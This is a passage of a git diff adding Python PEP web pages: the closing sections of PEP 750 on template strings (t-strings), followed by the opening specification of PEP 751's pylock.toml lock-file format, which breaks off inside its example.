+
+

How To Teach This

+

Template strings have several audiences:

+
    +
  • Developers using template strings and processing functions
  • +
  • Authors of template processing code
  • +
  • Framework authors who build interesting machinery with template strings
  • +
+

We hope that teaching developers will be straightforward. At a glance, +template strings look just like f-strings. Their syntax is familiar and the +scoping rules remain the same.

+

The first thing developers must learn is that template string literals don’t +evaluate to strings; instead, they evaluate to a new type, Template. This +is a simple type intended to be used by template processing code. It’s not until +developers call a processing function that they get the result they want: +typically, a string, although processing code can of course return any arbitrary +type.

+

Because developers will learn that t-strings are nearly always used in tandem +with processing functions, they don’t necessarily need to understand the details +of the Template type. As with descriptors and decorators, we expect many more +developers will use t-strings than write t-string processing functions.

+

Over time, a small number of more advanced developers will wish to author their +own template processing code. Writing processing code often requires thinking +in terms of formal grammars. Developers will need to learn how to parse the +args attribute of a Template instance and how to process interpolations +in a context-sensitive fashion. More sophisticated grammars will likely require +parsing to intermediate representations like an AST. Great template processing +code will handle format specifiers and conversions when appropriate. Writing +production-grade template processing code – for instance, to support HTML +templates – can be a large undertaking.

+

We expect that template strings will provide framework authors with a powerful +new tool in their toolbox. While the functionality of template strings overlaps +with existing tools like template engines, t-strings move that logic into +the language itself. Bringing the full power and generality of Python to bear on +string processing tasks opens new possibilities for framework authors.

+
+
+

Common Patterns Seen in Processing Templates

+
+

Structural Pattern Matching

+

Iterating over the Template.args with structural pattern matching is the expected +best practice for many template function implementations:

+
from templatelib import Template, Interpolation
+
+def process(template: Template) -> Any:
+    for arg in template.args:
+        match arg:
+            case str() as s:
+                ... # handle each string part
+            case Interpolation() as interpolation:
+                ... # handle each interpolation
+
+
+

Processing code may also commonly sub-match on attributes of the Interpolation type:

+
match arg:
+    case Interpolation(int()):
+        ... # handle interpolations with integer values
+    case Interpolation(value=str() as s):
+        ... # handle interpolations with string values
+    # etc.
+
+
+
+
+

Memoizing

+

Template functions can efficiently process both static and dynamic parts of templates. +The structure of Template objects allows for effective memoization:

+
source = template.args[::2]  # Static string parts
+values = [i.value for i in template.args[1::2]]  # Dynamic interpolated values
+
+
+

This separation enables caching of processed static parts, while dynamic parts can be +inserted as needed. Authors of template processing code can use the static +source as cache keys, leading to significant performance improvements when +similar templates are used repeatedly.

+
+
+

Parsing to Intermediate Representations

+

Code that processes templates can parse the template string into intermediate +representations, like an AST. We expect that many template processing libraries +will use this approach.

+

For instance, rather than returning a str, our theoretical html() function +(see the Motivation section) could return an HTML Element defined in the +same package:

+
@dataclass(frozen=True)
+class Element:
+    tag: str
+    attributes: Mapping[str, str | bool]
+    children: Sequence[str | Element]
+
+    def __str__(self) -> str:
+        ...
+
+
+def html(template: Template) -> Element:
+    ...
+
+
+

Calling str(element) would then render the HTML but, in the meantime, the +Element could be manipulated in a variety of ways.

+
+
+

Context-sensitive Processing of Interpolations

+

Continuing with our hypothetical html() function, it could be made +context-sensitive. Interpolations could be processed differently depending +on where they appear in the template.

+

For example, our html() function could support multiple kinds of +interpolations:

+
attributes = {"id": "main"}
+attribute_value = "shrubbery"
+content = "hello"
+template = t"<div {attributes} data-value={attribute_value}>{content}</div>"
+element = html(template)
+assert str(element) == '<div id="main" data-value="shrubbery">hello</div>'
+
+
+

Because the {attributes} interpolation occurs in the context of an HTML tag, +and because there is no corresponding attribute name, it is treated as a dictionary +of attributes. The {attribute_value} interpolation is treated as a simple +string value and is quoted before inclusion in the final string. The +{content} interpolation is treated as potentially unsafe content and is +escaped before inclusion in the final string.

+
+
+

Nested Template Strings

+

Going a step further with our html() function, we could support nested +template strings. This would allow for more complex HTML structures to be +built up from simpler templates:

+
name = "World"
+content = html(t"<p>Hello {name}</p>")
+template = t"<div>{content}</div>"
+element = html(template)
+assert str(element) == '<div><p>Hello World</p></div>'
+
+
+

Because the {content} interpolation is an Element instance, it does +not need to be escaped before inclusion in the final string.

+

One could imagine a nice simplification: if the html() function is passed +a Template instance, it could automatically convert it to an Element +by recursively calling itself on the nested template.

+

We expect that nesting and composition of templates will be a common pattern +in template processing code and, where appropriate, used in preference to +simple string concatenation.

+
+
+

Approaches to Lazy Evaluation

+

Like f-strings, interpolations in t-string literals are eagerly evaluated. However, +there are cases where lazy evaluation may be desirable.

+

If a single interpolation is expensive to evaluate, it can be explicitly wrapped +in a lambda in the template string literal:

+
name = "World"
+template = t"Hello {(lambda: name)}"
+assert callable(template.args[1].value)
+assert template.args[1].value() == "World"
+
+
+

This assumes, of course, that template processing code anticipates and handles +callable interpolation values. (One could imagine also supporting iterators, +awaitables, etc.) This is not a requirement of the PEP, but it is a common +pattern in template processing code.

+

In general, we hope that the community will develop best practices for lazy +evaluation of interpolations in template strings and that, when it makes sense, +common libraries will provide support for callable or awaitable values in +their template processing code.

+
+
+

Approaches to Asynchronous Evaluation

+

Closely related to lazy evaluation is asynchronous evaluation.

+

As with f-strings, the await keyword is allowed in interpolations:

+
async def example():
+    async def get_name() -> str:
+        await asyncio.sleep(1)
+        return "Sleepy"
+
+    template = t"Hello {await get_name()}"
+    # Use the f() function from the f-string example, above
+    assert f(template) == "Hello Sleepy"
+
+
+

More sophisticated template processing code can take advantage of this to +perform asynchronous operations in interpolations. For example, a “smart” +processing function could anticipate that an interpolation is an awaitable +and await it before processing the template string:

+
async def example():
+    async def get_name() -> str:
+        await asyncio.sleep(1)
+        return "Sleepy"
+
+    template = t"Hello {get_name}"
+    assert await aformat(template) == "Hello Sleepy"
+
+
+

This assumes that the template processing code in aformat() is asynchronous +and is able to await an interpolation’s value.

+
+

Note

+

Example code

+

See aformat.py and test_aformat.py.

+
+
+
+

Approaches to Template Reuse

+

If developers wish to reuse template strings multiple times with different +values, they can write a function to return a Template instance:

+
def reusable(name: str, question: str) -> Template:
+    return t"Hello {name}, {question}?"
+
+template = reusable("friend", "how are you")
+template = reusable("King Arthur", "what is your quest")
+
+
+

This is, of course, no different from how f-strings can be reused.

+
+
+
+

Reference Implementation

+

At the time of this PEP’s announcement, a fully-working implementation is +available.

+

There is also a public repository of examples and tests +built around the reference implementation. If you’re interested in playing with +template strings, this repository is a great place to start.

+
+
+

Rejected Ideas

+

This PEP has been through several significant revisions. In addition, quite a few interesting +ideas were considered both in revisions of PEP 501 and in the Discourse discussion.

+

We attempt to document the most significant ideas that were considered and rejected.

+
+

Arbitrary String Literal Prefixes

+

Inspired by JavaScript tagged template literals, +an earlier version of this PEP allowed for arbitrary “tag” prefixes in front +of literal strings:

+
my_tag'Hello {name}'
+
+
+

The prefix was a special callable called a “tag function”. Tag functions +received the parts of the template string in an argument list. They could then +process the string and return an arbitrary value:

+
def my_tag(*args: str | Interpolation) -> Any:
+    ...
+
+
+

This approach was rejected for several reasons:

+
    +
  • It was deemed too complex to build in full generality. JavaScript allows for +arbitrary expressions to precede a template string, which is a significant +challenge to implement in Python.
  • +
  • It precluded future introduction of new string prefixes.
  • +
  • It seemed to needlessly pollute the namespace.
  • +
+

Use of a single t prefix was chosen as a simpler, more Pythonic approach and +more in keeping with template strings’ role as a generalization of f-strings.

+
+
+

Delayed Evaluation of Interpolations

+

An early version of this PEP proposed that interpolations should be lazily +evaluated. All interpolations were “wrapped” in implicit lambdas. Instead of +having an eagerly evaluated value attribute, interpolations had a +getvalue() method that would resolve the value of the interpolation:

+
class Interpolation:
+    ...
+    _value: Callable[[], object]
+
+    def getvalue(self) -> object:
+        return self._value()
+
+
+

This was rejected for several reasons:

+
    +
  • The overwhelming majority of use cases for template strings naturally call +for immediate evaluation.
  • +
  • Delayed evaluation would be a significant departure from the behavior of +f-strings.
  • +
  • Implicit lambda wrapping leads to difficulties with type hints and +static analysis.
  • +
+

Most importantly, there are viable (if imperfect) alternatives to implicit +lambda wrapping when lazy evaluation is desired. See the section on +Approaches to Lazy Evaluation, above, for more information.

+
+
+

Making Template and Interpolation Into Protocols

+

An early version of this PEP proposed that the Template and Interpolation +types be runtime checkable protocols rather than concrete types.

+

In the end, we felt that using concrete types was more straightforward.

+
+
+

An Additional Decoded Type

+

An early version of this PEP proposed an additional type, Decoded, to represent +the “static string” parts of a template string. This type derived from str and +had a single extra raw attribute that provided the original text of the string. +We rejected this in favor of the simpler approach of using plain str and +allowing combination of r and t prefixes.

+
+
+

Other Homes for Template and Interpolation

+

Previous versions of this PEP proposed that the Template and Interpolation +types be placed in the types module. This was rejected in favor of creating +a new top-level standard library module, templatelib. This was done to avoid +polluting the types module with seemingly unrelated types.

+
+
+

Enable Full Reconstruction of Original Template Literal

+

Earlier versions of this PEP attempted to make it possible to fully reconstruct +the text of the original template string from a Template instance. This was +rejected as being overly complex.

+

There are several limitations with respect to round-tripping to the original +source text:

+
    +
  • Interpolation.format_spec defaults to "" if not provided. It is therefore +impossible to distinguish t"{expr}" from t"{expr:}".
  • +
  • The debug specifier, =, is treated as a special case. It is therefore not +possible to distinguish t"{expr=}" from t"expr={expr}".
  • +
  • Finally, format specifiers in f-strings allow arbitrary nesting. In this PEP +and in the reference implementation, the specifier is eagerly evaluated +to set the format_spec in the Interpolation, thereby losing +the original expressions. For example:
  • +
+
value = 42
+precision = 2
+template = t"Value: {value:.{precision}f}"
+assert template.args[1].format_spec == ".2f"
+
+
+

We do not anticipate that these limitations will be a significant issue in practice. +Developers who need to obtain the original template string literal can always +use inspect.getsource() or similar tools.

+
+
+

Disallowing String Concatenation

+

Earlier versions of this PEP proposed that template strings should not support +concatenation. This was rejected in favor of allowing concatenation.

+

There are reasonable arguments in favor of rejecting one or all forms of +concatenation: namely, that it cuts off a class of potential bugs, particularly +when one takes the view that template strings will often contain complex grammars +for which concatenation doesn’t always have the same meaning (or any meaning).

+

Moreover, the earliest versions of this PEP proposed a syntax closer to +JavaScript’s tagged template literals, where an arbitrary callable could be used +as a prefix to a string literal. There was no guarantee that the callable would +return a type that supported concatenation.

+

In the end, we decided that the surprise to developers of a new string type +not supporting concatenation was likely to be greater than the theoretical +harm caused by supporting it. (Developers concatenate f-strings all the time, +after all, and while we are sure there are cases where this introduces bugs, +it’s not clear that those bugs outweigh the benefits of supporting concatenation.)

+

While concatenation is supported, we expect that code that uses template strings +will more commonly build up larger templates through nesting and composition +rather than concatenation.

+
+
+

Arbitrary Conversion Values

+

Python allows only r, s, or a as possible conversion type values. +Trying to assign a different value results in SyntaxError.

+

In theory, template functions could choose to handle other conversion types. But this +PEP adheres closely to PEP 701. Any changes to allowed values should be in a +separate PEP.

+
+
+

Removing conv From Interpolation

+

During the authoring of this PEP, we considered removing the conv attribute +from Interpolation and specifying that the conversion should be performed +eagerly, before Interpolation.value is set.

+

This was done to simplify the work of writing template processing code. The +conv attribute is of limited extensibility (it is typed as +Literal["r", "s", "a"] | None). It is not clear that it adds significant +value or flexibility to template strings that couldn’t better be achieved with +custom format specifiers. Unlike with format specifiers, there is no +equivalent to Python’s format() built-in. (Instead, we include an +sample implementation of convert() in the Examples section.)

+

Ultimately we decided to keep the conv attribute in the Interpolation type +to maintain compatibility with f-strings and to allow for future extensibility.

+
+
+

Alternate Interpolation Symbols

+

In the early stages of this PEP, we considered allowing alternate symbols for +interpolations in template strings. For example, we considered allowing +${name} as an alternative to {name} with the idea that it might be useful +for i18n or other purposes. See the +Discourse thread +for more information.

+

This was rejected in favor of keeping t-string syntax as close to f-string syntax +as possible.

+
+
+

A Lazy Conversion Specifier

+

We considered adding a new conversion specifier, !(), that would explicitly +wrap the interpolation expression in a lambda.

+

This was rejected in favor of the simpler approach of using explicit lambdas +when lazy evaluation is desired.

+
+
+

Alternate Layouts for Template.args

+

During the development of this PEP, we considered several alternate layouts for +the args attribute of the Template type. This included:

+
    +
  • Instead of args, Template contains a strings attribute of type +Sequence[str] and an interpolations attribute of type +Sequence[Interpolation]. There are zero or more interpolations and +there is always one more string than there are interpolations. Utility code +could build an interleaved sequence of strings and interpolations from these +separate attributes. This was rejected as being overly complex.
  • +
  • args is typed as a Sequence[tuple[str, Interpolation | None]]. Each +static string is paired with is neighboring interpolation. The final +string part has no corresponding interpolation. This was rejected as being +overly complex.
  • +
  • args remains a Sequence[str | Interpolation] but does not support +interleaving. As a result, empty strings are not added to the sequence. It is +no longer possible to obtain static strings with args[::2]; instead, +instance checks or structural pattern matching must be used to distinguish +between strings and interpolations. We believe this approach is easier to +explain and, at first glance, more intuitive. However, it was rejected as +offering less future opportunty for performance optimization. We also believe +that args[::2] may prove to be a useful shortcut in template processing +code.
  • +
+
+
+

Mechanism to Describe the “Kind” of Template

+

If t-strings prove popular, it may be useful to have a way to describe the +“kind” of content found in a template string: “sql”, “html”, “css”, etc. +This could enable powerful new features in tools such as linters, formatters, +type checkers, and IDEs. (Imagine, for example, black formatting HTML in +t-strings, or mypy checking whether a given attribute is valid for an HTML +tag.) While exciting, this PEP does not propose any specific mechanism. It is +our hope that, over time, the community will develop conventions for this purpose.

+
+
+
+

Acknowledgements

+

Thanks to Ryan Morshead for contributions during development of the ideas leading +to template strings. Special mention also to Dropbox’s +pyxl for tackling similar ideas years ago. +Finally, thanks to Joachim Viide for his pioneering work on the tagged library. Tagged was not just the precursor to +template strings, but the place where the whole effort started via a GitHub issue +comment!

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0750.rst

+

Last modified: 2024-10-22 09:28:54 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0751/index.html b/pep-0751/index.html new file mode 100644 index 00000000000..088f437e4be --- /dev/null +++ b/pep-0751/index.html @@ -0,0 +1,1528 @@ + + + + + + + + PEP 751 – A file format to record Python dependencies for installation reproducibility | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 751 – A file format to record Python dependencies for installation reproducibility

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
24-Jul-2024
+
Post-History:
+
25-Jul-2024 +30-Oct-2024
+
Replaces:
+
665
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new file format for dependency specification +to enable reproducible installation in a Python environment. The format is +designed to be human-readable and machine-generated. Installers consuming the +file should be able to calculate what to install without the need for dependency +resolution at install-time.

+
+
+

Motivation

+

Currently, no standard exists to create an immutable record, such as a lock +file, which specifies what direct and indirect dependencies should be installed +into a virtual environment.

+

Considering there are at least five well-known solutions to this problem in the +community (pip freeze, pip-tools, uv, Poetry, and PDM), there seems to +be an appetite for lock files in general.

+

Those tools also vary in what locking scenarios they support. For instance, +pip freeze and pip-tools only generate lock files for the current +environment while PDM and Poetry try to lock for any environment to some +degree. There’s also concerns around the lack of secure defaults in the face of +supply chain attacks (e.g., always including hashes for files).

+

The lack of a standard also has some drawbacks. For instance, any tooling that +wants to work with lock files must choose which format to support, potentially +leaving users unsupported (e.g., Dependabot only supporting select tools, +same for cloud providers who can do dependency installations on your behalf, +etc.). It also impacts portability between tools, which causes vendor lock-in. +By not having compatibility and interoperability it fractures tooling around +lock files where both users and tools have to choose what lock file format to +use upfront and making it costly to use/switch to other formats. Rallying +around a single format removes that cost/barrier.

+
+

Note

+

Much of the motivation from PEP 665 also applies to this PEP.

+
+
+
+

Rationale

+

The format is designed so that a locker which produces the lock file +and an installer which consumes the lock file can be separate tools. This +allows for situations such as cloud hosting providers to use their own installer +that’s optimized for their system which is independent of what locker the user +used to create their lock file.

+

The file format is designed to be human-readable. This is so that the contents +of the file can be audited by a human to make sure no undesired dependencies end +up being included in the lock file.

+

The file format is also designed to not require a resolver at install time. This +greatly simplifies installers and thus reasoning about what would be installed +when consuming a lock file. It should also lead to faster installs which are +much more frequent than creating a lock file.

+

Finally, the lock file is meant to be flexible enough to meets the various needs +tools have for choosing what to install. That means the lock file records the +dependency graph of what _may_ be installed. This allows tools to enter the +graph at any point and still have reproducible results from that root of the +graph. Flexibility also means supporting different installation scenarios within +the same lock file (e.g., with or without test dependencies).

+
+
+

Specification

+
+

File Name

+

A lock file MUST be named pylock.toml. The use of the .toml file +extension is to make syntax highlighting in editors easier and to reinforce the +fact that the file format is meant to be human-readable.

+

The lock file SHOULD be located in the directory as appropriate for the scope of +the lock file. Locking against a single pyproject.toml, for instance, would +place the pylock.toml in the same directory. If the lock file covered +multiple projects in a monorepo, then the expectation is the pylock.toml +file would be in the directory that held all the projects being locked.

+
+
+

File Format

+

The format of the file is TOML.

+

All keys listed below are required unless otherwise noted. If two keys are +mutually exclusive to one another, then one of the keys is required while the +other is disallowed.

+

Keys in tables – including the top-level table – SHOULD be emitted by lockers +in the order they are listed in this PEP when applicable unless another sort +order is specified to minimize noise in diffs. If the keys are not explicitly +specified in this PEP, then the keys SHOULD be sorted by lexicographic order.

+

As well, lockers SHOULD sort arrays in lexicographic order unless otherwise +specified for the same reason.

+
+

version

+
    +
  • String
  • +
  • The version of the lock file format.
  • +
  • This PEP specifies the initial version – and only valid value until future +updates to the standard change it – as "1.0".
  • +
  • If an installer supports the major version but not the minor version, a tool +SHOULD warn when an unknown key is seen.
  • +
  • If an installer doesn’t support a major version, it MUST raise an error.
  • +
+
+
+

hash-algorithm

+
    +
  • String
  • +
  • The name of the hash algorithm used for calculating all hash values.
  • +
  • Only a single hash algorithm is used for the entire file to allow hash values +to be written in inline tables for readability and compactness purposes by +only listing a single hash value instead of multiple values based on multiple +hash algorithms.
  • +
  • Specifying a single hash algorithm guarantees that an algorithm that the user +prefers is used consistently throughout the file without having to audit +each file hash value separately.
  • +
  • Allows for updating the entire file to a new hash algorithm without running +the risk of accidentally leaving an old hash value in the file.
  • +
  • JSON-based Simple API for Python Package Indexes and the hashes dictionary of +of the files dictionary of the Project Details dictionary specifies what +values are valid and guidelines on what hash algorithms to use.
  • +
  • Failure to validate any hash values for any file that is to be installed MUST +raise an error.
  • +
+
+
+

[locker]

+
    +
  • Table
  • +
  • Record of the tool that generated the lock file.
  • +
  • Enough details SHOULD be provided such that the lock +file from the details in this table can be reproduced (provided the same I/O +data is available, e.g., Dependabot if only files from a repository is +necessary to run the command).
  • +
+
+
locker.name
+
    +
  • String
  • +
  • The name of the tool used to create the lock file.
  • +
  • If the locker is a Python project, its normalized name SHOULD be used.
  • +
+
+
+
locker.version
+
    +
  • String
  • +
  • The version of the tool used.
  • +
+
+
+
locker.run
+
    +
  • Optional
  • +
  • Inline table
  • +
  • Records the command used to create the lock file.
  • +
+
+
locker.run.module
+
    +
  • Optional
  • +
  • String
  • +
  • The module name used for running the locker (i.e. what would be passed to +python -m).
  • +
  • Lockers MUST specify this key if the locker can be executed via python -m.
  • +
+
+
+
locker.run.args
+
    +
  • Optional
  • +
  • Array of strings
  • +
  • If the locker has a CLI, the arguments to pass to the locker.
  • +
  • All paths MUST be relative to the lock file so that another tool could use +the lock file’s location as the current working directory.
  • +
+
+
+
+
+

[[groups]]

+
    +
  • Array of tables
  • +
  • A named subset of packages as found in [[packages]].
  • +
  • Act as roots into the dependency graph.
  • +
  • Installers MUST allow the user to select one or more groups by name to +install all relevant packages together.
  • +
  • Installers SHOULD let the user skip specifying a name if there is only one +entry in the array.
  • +
+
+
groups.name
+
    +
  • String
  • +
  • The name of the group.
  • +
+
+
+
groups.project
+
    +
  • Mutually-exclusive with requirements
  • +
  • String
  • +
  • The normalized name of a package to act as the starting point into the +dependency graph.
  • +
  • Analogous to locking to the [project] table in pyproject.toml.
  • +
  • Installers MUST let a user specify any optional features/extras that the +package provides.
  • +
  • Lockers MUST NOT allow for ambiguity by specifying multiple package versions +of the same package under the same group name when a package is listed in any +project key.
  • +
+
+
+
groups.requirements
+
    +
  • Mutually-exclusive with project
  • +
  • Array of tables
  • +
  • Represents the installation requirements for this group.
  • +
  • Analogous to a key in [dependency-groups] in pyproject.toml.
  • +
  • Lockers MUST make sure that resolving any requirement for any environment does +not lead to ambiguity by having multiple values in [[packages]] match the +same requirement.
  • +
  • Values in the array SHOULD be written as inline tables, sorted +lexicographically by name, then by feature with the lack of that key +sorting first.
  • +
+
+
groups.requirements.name
+
    +
  • String
  • +
  • Normalized name of the package.
  • +
+
+
+
groups.requirements.extras
+
    +
  • Optional
  • +
  • Array of strings
  • +
  • The names of the extras specified for the requirement +(i.e. what comes between [...]).
  • +
+
+
+
groups.requirements.version
+ +
+
+
groups.requirements.marker
+ +
+
+
+
+

[[packages]]

+
    +
  • Array of tables
  • +
  • The array contains all data on the nodes of the dependency graph.
  • +
  • Lockers SHOULD record packages in order by name +lexicographically, version by its Python version specifiers +ordering, and then by groups following Python’s sort order for lists of +strings (i.e. item by item, then by length as a tiebreaker).
  • +
+
+
packages.name
+ +
+
+
packages.version
+
    +
  • String
  • +
  • The version of the package.
  • +
+
+
+
packages.groups
+
    +
  • Array of strings
  • +
  • Associates this table with the group.name entries of the same names.
  • +
+
+
+
packages.index-url
+ +
+
+
packages.direct
+
    +
  • Optional (defaults to false)
  • +
  • Boolean
  • +
  • Represents whether the installation is via a direct URL reference.
  • +
+
+
+
packages.requires-python
+
    +
  • String
  • +
  • Holds the version specifiers for Python version compatibility for the +package and version.
  • +
  • The value MUST match what’s provided by the package version, if available, via +Requires-Python.
  • +
+
+
+
[[packages.dependencies]]
+
    +
  • Array of tables
  • +
  • A record of the dependency requirements of the package and version.
  • +
  • The values MUST semantically match what’s provided by the package version via +Requires-Dist (multiple use) for all dependencies referenced +in the lock file (i.e all base dependencies plus all dependencies for extras +referenced in the lock file); lock files MAY list all dependencies for unused +extras if desired.
  • +
  • Values in the array SHOULD be written as inline tables, sorted +lexicographically by name, then by feature with the lack of that key +sorting first.
  • +
+
+
packages.dependencies.name
+

See groups.requirements.name.

+
+
+
packages.dependencies.extras
+

See groups.requirements.extras.

+
+
+
packages.dependencies.version
+

See groups.requirements.version.

+
+
+
packages.dependencies.marker
+

See groups.requirements.marker.

+
+
+
packages.dependencies.feature
+ +
+
+
+
packages.editable
+
    +
  • Optional (defaults to false)
  • +
  • Boolean
  • +
  • Specifies whether the package should be installed in editable mode.
  • +
+
+
+
[packages.source-tree]
+
    +
  • Optional
  • +
  • Table
  • +
  • For recording where to find the source tree for the package version.
  • +
  • Lockers SHOULD write this table inline.
  • +
  • Support for source trees by installers is optional.
  • +
  • If support is provided by an installer it SHOULD be opt-in.
  • +
  • If multiple source trees are provided, installers MUST prefer either the +vcs option or a file for security/reproducibility due to their commit or +hash, respectively.
  • +
+
+
packages.source-tree.vcs
+
    +
  • Optional
  • +
  • String
  • +
  • If specifying a VCS, the type of version control system used.
  • +
  • The valid values are specified by the +registered VCSs +of the direct URL data structure.
  • +
+
+
+
packages.source-tree.path
+
    +
  • Required if url is not set
  • +
  • String
  • +
  • A path to the source tree, which may be absolute or relative.
  • +
  • If the path is relative it MUST be relative to the lock file.
  • +
  • The path may either be to a directory, file archive, or VCS checkout if +vcs if is specified.
  • +
+
+
+
packages.source-tree.url
+
    +
  • Required if path is not set
  • +
  • String
  • +
  • A URL to a file archive containing the source tree, or a VCS checkout if +vcs is specified.
  • +
+
+
+
packages.source-tree.commit
+
    +
  • Required if vcs is set
  • +
  • String
  • +
  • The commit ID for the repository which represents the package and version.
  • +
  • The value MUST be immutable for the VCS for security purposes +(e.g. no Git tags).
  • +
+
+
+
packages.source-tree.size
+
    +
  • Optional
  • +
  • Integer
  • +
  • The size in bytes for the source tree if it is a file.
  • +
  • Installers MUST verify the file size matches this value.
  • +
+
+
+
packages.source-tree.hash
+
    +
  • Required if url or path points to a file
  • +
  • String
  • +
  • The hash value of the file contents using the hash algorithm specified by +hash-algorithm.
  • +
  • Installers MUST verify the hash matches the file.
  • +
+
+
+
+
[packages.sdist]
+
    +
  • Optional
  • +
  • Table
  • +
  • The location of a source distribution as specified by +Source distribution format.
  • +
  • Lockers SHOULD write the table inline.
  • +
  • Support for source distributions by installers is optional.
  • +
  • If support is provided by an installer it SHOULD be opt-in.
  • +
+
+
packages.sdist.url
+
    +
  • Optional; mutually-exclusive with path
  • +
  • String
  • +
  • The URL to the file.
  • +
+
+
+
packages.sdist.path
+
    +
  • Optional; mutually-exclusive with url
  • +
  • String
  • +
  • A path to the file, which may be absolute or relative.
  • +
  • If the path is relative it MUST be relative to the lock file.
  • +
+
+
+
packages.sdist.upload-time
+
    +
  • Optional and only applicable when url is specified
  • +
  • Offset date time
  • +
  • The upload date and time of the file as specified by a valid ISO 8601 +date/time string for the .files[]."upload-time" field in the JSON +version of Simple repository API.
  • +
+
+
+
packages.sdist.size
+
    +
  • Optional
  • +
  • Integer
  • +
  • The size of the file in bytes.
  • +
  • Installers MUST verify the file size matches this value.
  • +
+
+
+
packages.sdist.hash
+
    +
  • String
  • +
  • The hash value of the file contents using the hash algorithm specified by +hash-algorithm.
  • +
  • Installers MUST verify the hash matches the file.
  • +
+
+
+
+
[[packages.wheels]]
+
    +
  • Optional
  • +
  • Array of tables
  • +
  • For recording the wheel files as specified by +Binary distribution format for the package version.
  • +
  • Lockers SHOULD write the table inline.
  • +
  • Lockers SHOULD sort the array values lexicographically by tag.
  • +
+
+
packages.wheels.tags
+
    +
  • Array of string
  • +
  • The uncompressed tag portion of the wheel file: Python, ABI, and platform.
  • +
  • Lockers MUST make sure the tag values are unique within the +packages.wheels array.
  • +
+
+
+
packages.wheels.build
+
    +
  • Optional
  • +
  • String
  • +
  • The build tag for the wheel file (if appropriate).
  • +
+
+
+
packages.wheels.url
+

See packages.sdist.url.

+
+
+
packages.wheels.path
+

See packages.sdist.path.

+
+
+
packages.wheels.upload-time
+

See packages.sdist.upload-time.

+
+
+
packages.wheels.size
+

See packages.sdist.size.

+
+
+
packages.wheels.hash
+

See packages.sdist.hash.

+
+
+
+
[packages.tool]
+
    +
  • Optional
  • +
  • Table
  • +
  • Similar usage as that of the [tool] table from the +pyproject.toml specification , but at the package version level instead of +at the lock file level (which is also available via [tool]).
  • +
  • Useful for scoping package version/release details (e.g., recording signing +identities to then use to verify package integrity separately from where the +package is hosted, prototyping future extensions to this file format, etc.).
  • +
+
+
+
+

[tool]

+ +
+
+
+

Examples

+
version = '1.0'
+hash-algorithm = 'sha256'
+
+[locker]
+name = 'mousebender'
+version = 'pep'
+run = { module = 'mousebender', args = ['lock', '--platform', 'cpython3.12-manylinux2014-x64', '--platform', 'cpython3.12-windows-x64', 'cattrs', 'numpy'] }
+
+[[groups]]
+name = 'Default'
+requirements = [
+  { name = 'cattrs' },
+  { name = 'numpy' },
+]
+
+[[packages]]
+name = 'attrs'
+version = '24.2.0'
+groups = ['Default']
+index_url = 'https://pypi.org/simple/attrs'
+direct = false
+requires_python = '>=3.7'
+dependencies = [
+  { name = 'importlib-metadata', marker = 'python_version < "3.8"' },
+  { name = 'cloudpickle', marker = 'platform_python_implementation == "CPython"', feature = 'benchmark' },
+  { name = 'hypothesis', feature = 'benchmark' },
+  { name = 'mypy', version = '>=1.11.1', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9"', feature = 'benchmark' },
+  { name = 'pympler', feature = 'benchmark' },
+  { name = 'pytest-codspeed', feature = 'benchmark' },
+  { name = 'pytest-mypy-plugins', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9" and python_version < "3.13"', feature = 'benchmark' },
+  { name = 'pytest-xdist', extras = ['psutil'], feature = 'benchmark' },
+  { name = 'pytest', version = '>=4.3.0', feature = 'benchmark' },
+  { name = 'cloudpickle', marker = 'platform_python_implementation == "CPython"', feature = 'cov' },
+  { name = 'coverage', extras = ['toml'], version = '>=5.3', feature = 'cov' },
+  { name = 'hypothesis', feature = 'cov' },
+  { name = 'mypy', version = '>=1.11.1', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9"', feature = 'cov' },
+  { name = 'pympler', feature = 'cov' },
+  { name = 'pytest-mypy-plugins', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9" and python_version < "3.13"', feature = 'cov' },
+  { name = 'pytest-xdist', extras = ['psutil'], feature = 'cov' },
+  { name = 'pytest', version = '>=4.3.0', feature = 'cov' },
+  { name = 'cloudpickle', marker = 'platform_python_implementation == "CPython"', feature = 'dev' },
+  { name = 'hypothesis', feature = 'dev' },
+  { name = 'mypy', version = '>=1.11.1', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9"', feature = 'dev' },
+  { name = 'pre-commit', feature = 'dev' },
+  { name = 'pympler', feature = 'dev' },
+  { name = 'pytest-mypy-plugins', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9" and python_version < "3.13"', feature = 'dev' },
+  { name = 'pytest-xdist', extras = ['psutil'], feature = 'dev' },
+  { name = 'pytest', version = '>=4.3.0', feature = 'dev' },
+  { name = 'cogapp', feature = 'docs' },
+  { name = 'furo', feature = 'docs' },
+  { name = 'myst-parser', feature = 'docs' },
+  { name = 'sphinx', feature = 'docs' },
+  { name = 'sphinx-notfound-page', feature = 'docs' },
+  { name = 'sphinxcontrib-towncrier', feature = 'docs' },
+  { name = 'towncrier', version = '<24.7', feature = 'docs' },
+  { name = 'cloudpickle', marker = 'platform_python_implementation == "CPython"', feature = 'tests' },
+  { name = 'hypothesis', feature = 'tests' },
+  { name = 'mypy', version = '>=1.11.1', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9"', feature = 'tests' },
+  { name = 'pympler', feature = 'tests' },
+  { name = 'pytest-mypy-plugins', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9" and python_version < "3.13"', feature = 'tests' },
+  { name = 'pytest-xdist', extras = ['psutil'], feature = 'tests' },
+  { name = 'pytest', version = '>=4.3.0', feature = 'tests' },
+  { name = 'mypy', version = '>=1.11.1', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9"', feature = 'tests-mypy' },
+  { name = 'pytest-mypy-plugins', marker = 'platform_python_implementation == "CPython" and python_version >= "3.9" and python_version < "3.13"', feature = 'tests-mypy' }
+]
+editable = false
+wheels = [
